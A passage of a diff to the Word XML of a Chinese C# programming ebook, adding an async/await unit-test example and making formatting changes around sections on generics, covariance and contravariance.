+        <w:t>async</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，然后在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>await</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>一下异步方法即可。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>[Test]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>public async Task SynchronizeTestWithCodeViaAwait()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>  var sut = new SystemUnderTest();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>  // Schedule operation to run asynchronously and wait until it is finished.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>  await sut.StartAsync();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>  // Assert outcome of the operation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>  Assert.AreEqual("Init Work", sut.Message);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="123"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37290,7 +37825,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>VS</w:t>
       </w:r>
       <w:r>
@@ -38036,6 +38570,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Ex：</w:t>
       </w:r>
     </w:p>
@@ -38983,6 +39518,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>中心化配置</w:t>
       </w:r>
     </w:p>
@@ -39110,7 +39646,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>例如：我们可以发布一个</w:t>
       </w:r>
       <w:r>
@@ -40443,6 +40978,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="zh-CN"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>契约也支持类的层次结构，其命名空间会伴随整个层次机构。为了支持多态及包含其他对象的容器，</w:t>
       </w:r>
       <w:r>
@@ -40834,7 +41370,6 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>[</w:t>
       </w:r>
       <w:r>
@@ -41677,6 +42212,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">　</w:t>
       </w:r>
       <w:r>
@@ -41797,7 +42333,6 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -42658,6 +43193,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Spring.NET</w:t>
       </w:r>
     </w:p>
@@ -42824,7 +43360,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Quartz</w:t>
       </w:r>
     </w:p>
@@ -43453,6 +43988,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Business Process Management - BPM </w:t>
       </w:r>
       <w:r>
@@ -43689,7 +44225,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>.Net常用工具及插件</w:t>
       </w:r>
     </w:p>
@@ -44503,7 +45038,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>1.12.2(</w:t>
       </w:r>
       <w:r>
@@ -56643,6 +57177,7 @@
     <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Normal (Web)" w:uiPriority="99" w:qFormat="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:uiPriority="99"/>
     <w:lsdException w:name="Normal Table" w:semiHidden="1" w:qFormat="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
@@ -57143,6 +57678,53 @@
       <w:szCs w:val="13"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="HTMLChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D70E1A"/>
+    <w:pPr>
+      <w:widowControl/>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:jc w:val="left"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLChar">
+    <w:name w:val="HTML 预设格式 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="HTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00D70E1A"/>
+    <w:rPr>
+      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -57423,7 +58005,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8FD34C45-EF18-4EB7-B1C1-DA5477574A9D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7E025974-6221-4277-85F5-7A51F01C2CFE}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -3218,7 +3218,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="C00000"/>
+          <w:color w:val="FF0000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -3244,6 +3244,9 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3258,7 +3261,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="C00000"/>
+          <w:color w:val="FF0000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -3315,6 +3318,14 @@
         </w:rPr>
         <w:t>定义了允许使用的类型。</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3325,13 +3336,13 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:color w:val="C00000"/>
+          <w:color w:val="0070C0"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="C00000"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -3407,6 +3418,9 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3488,6 +3502,14 @@
         </w:rPr>
         <w:t>TInput</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3799,6 +3821,9 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3806,6 +3831,14 @@
         </w:rPr>
         <w:t>使用泛型类型可以定义接口，在接口的定义中可以使用带泛型的参数</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3819,8 +3852,28 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>协变和抗变：在</w:t>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>协变</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>抗变</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：在</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3859,8 +3912,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>协变：协变类型用</w:t>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>协变</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：协变类型用</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3872,13 +3932,50 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>参数标注，这也意味着返回值只能是</w:t>
+        <w:t>参数标注，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
